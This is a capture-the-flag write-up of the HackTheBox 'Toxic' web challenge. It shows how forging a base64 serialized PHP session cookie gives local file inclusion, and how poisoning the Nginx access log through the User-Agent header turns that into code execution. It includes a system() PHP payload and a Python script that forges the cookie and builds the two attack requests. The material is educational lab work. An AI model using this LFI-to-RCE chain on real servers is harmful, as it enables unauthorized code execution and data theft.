We covered local file inclusion (LFI), a web application vulnerability, and the concept of log file poisoning, showing how to move from LFI to log poisoning and from there to code execution. We used the HackTheBox Toxic web challenge as lab material: an Nginx web server fronting a PHP application that stores its session cookie in base64 format.
Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸
In the challenge we had PHP source code in which the cookie named PHPSESSID is created with setcookie(). Its value is the base64 encoding of a serialized object called $page of type PageModel, whose $file property is set to "/www/index.html".
An if statement checks whether the PHPSESSID cookie exists; if it does, its value is decoded with base64_decode() and then passed to unserialize(), turning it back into a PHP object whose $file property is then included. Because the client fully controls the cookie, the client controls $file.
If we can change the $file property to point at the flag, we have exploited a local file inclusion vulnerability. The flag's filename is not known in advance, however, so to learn its location we need to escalate the LFI to remote code execution. This is done by poisoning the User-Agent entry in the Nginx access log at /var/log/nginx/access.log and then including that log through the same $file property.
We can use the simple PHP one-liner <?php system('ls /'); ?> to list the contents of the root directory. Use single quotes: Nginx escapes double quotes and backslashes as \x22 and \x5C when writing the access log, which would break the PHP syntax. The one-liner goes in the User-Agent field while intercepting the GET request in Burp Suite; a second request with a cookie whose $file points at /var/log/nginx/access.log then includes the poisoned log and executes the command. The directory listing revealed the flag's filename, and pointing $file (or a second system() call) at it retrieved the flag 🚩.
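The cookie forging and the two-request LFI-to-log-poisoning chain described above, as an added Python example (not code from the challenge or the original post). It assumes PageModel has a single public property $file, so PHP serializes it as s:4:"file" (a protected or private property would carry a mangled name), and that Nginx logs $http_user_agent with its default escaping. It builds the requests as strings and never touches the network.

```python
import base64
import re

# Added example for the HackTheBox "Toxic" LFI -> log poisoning chain.
# Assumptions (not stated on the page): PageModel has exactly one *public*
# property $file, and nginx uses its default access-log escaping, under
# which '"' and '\' are written as \x22 and \x5C.

LOG_PATH = "/var/log/nginx/access.log"
DEFAULT_FILE = "/www/index.html"


def php_serialize_pagemodel(file_path: str) -> str:
    """Return PHP serialize() output for a PageModel whose only public
    property is $file. PHP string lengths are byte counts, so measure the
    UTF-8 encoding rather than the character count."""
    raw = file_path.encode()
    return f'O:9:"PageModel":1:{{s:4:"file";s:{len(raw)}:"{file_path}";}}'


def make_cookie(file_path: str) -> str:
    """Base64 of the serialized object: the exact PHPSESSID value the app expects."""
    return base64.b64encode(php_serialize_pagemodel(file_path).encode()).decode()


_FILE_RE = re.compile(r's:4:"file";s:(\d+):"(.*)";}$', re.S)


def parse_cookie(cookie: str) -> str:
    """Mirror of the server's base64_decode() + unserialize() for this one
    object shape: recover $file and check the declared length is honest."""
    serialized = base64.b64decode(cookie).decode()
    m = _FILE_RE.search(serialized)
    if not m or int(m.group(1)) != len(m.group(2).encode()):
        raise ValueError("not a PageModel cookie or length field is wrong")
    return m.group(2)


def php_user_agent_payload(cmd: str) -> str:
    """PHP one-liner to plant in the User-Agent header.
    Double quotes and backslashes are escaped by nginx in the log and a
    single quote would close the PHP string early, so reject all three."""
    if any(c in cmd for c in ('"', "\\", "'")):
        raise ValueError("command must not contain quotes or backslashes")
    return f"<?php system('{cmd}'); ?>"


def build_poison_request(host: str, cmd: str) -> str:
    """Request 1: get the PHP payload written into access.log via User-Agent."""
    return (
        f"GET / HTTP/1.1\r\nHost: {host}\r\n"
        f"User-Agent: {php_user_agent_payload(cmd)}\r\n"
        "Connection: close\r\n\r\n"
    )


def build_trigger_request(host: str, file_path: str = LOG_PATH) -> str:
    """Request 2: cookie whose $file points at the log, so the file
    inclusion pulls in the poisoned line and PHP executes the payload."""
    return (
        f"GET / HTTP/1.1\r\nHost: {host}\r\n"
        f"Cookie: PHPSESSID={make_cookie(file_path)}\r\n"
        "Connection: close\r\n\r\n"
    )


if __name__ == "__main__":
    # "target.example" is a placeholder host, not the challenge instance.
    print(php_serialize_pagemodel(DEFAULT_FILE))
    print(build_poison_request("target.example", "ls /"))
    print(build_trigger_request("target.example"))
```

Paste the output of build_trigger_request's Cookie header into Burp's Repeater after sending the poisoning request once. Base64 may end in `=`; PHP splits cookie pairs on the first `=` only and URL-decodes values, so either the raw or a percent-encoded value works.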